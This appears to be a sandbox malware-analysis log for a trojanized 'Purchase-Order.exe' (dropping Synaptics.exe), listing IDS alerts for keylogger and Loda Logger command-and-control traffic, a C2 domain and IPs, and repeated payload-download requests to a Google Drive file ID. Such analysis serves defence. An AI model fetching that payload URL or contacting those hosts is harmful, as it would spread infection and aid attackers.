                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49957 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49958 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49975 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49981 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49988 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49989 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50000 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50001 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50004 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50022 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50023 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50054 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50055 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50081 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50112 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50123 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50122 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50147 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50146 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50156 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50157 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50189 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50192 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50198 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50199 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50214 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50215 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50225 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50223 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50234 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50235 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50250 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50251 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50260 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50261 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50276 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50273 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50287 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50288 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50310 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50311 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50331 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50332 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50345 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50346 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50377 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50376 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50379 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50378 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50411 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50412 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50435 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50437 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50439 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50440 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50445 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50446 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50451 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50452 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50454 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50455 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50458 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50459 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50464 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50467 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50470 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50471 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50486 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50489 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50495 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50496 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50501 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50502 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50506 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50505 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50508 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50507 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50520 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50521 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50529 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50530 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50534 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50536 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50538 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50539 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50548 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50547 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50552 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50551 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50559 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50560 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50565 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:50569 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50570 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50571 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50574 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:50575 version: TLS 1.2
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Purchase-Order.exe, 00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00D92044
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00D9219F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00D924A9
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_00D86B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_00D86E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_00D8F350
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_00D8FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D5DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_00D5DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D8FD47 FindFirstFileW,FindClose,8_2_00D8FD47
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Purchase-Order.exeFile opened: C:\Users\user\AppDataJump to behavior

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49758 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49758 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49739 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.4:49758
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49736 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49753 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49755 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49763 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49774 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49762 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49766 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49777 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49776 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49782 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49743 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49735 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49740 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49746 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49749 -> 142.250.186.142:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49767 -> 142.250.186.142:443
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeCode function: 8_2_00D9550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,8_2_00D9550C
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
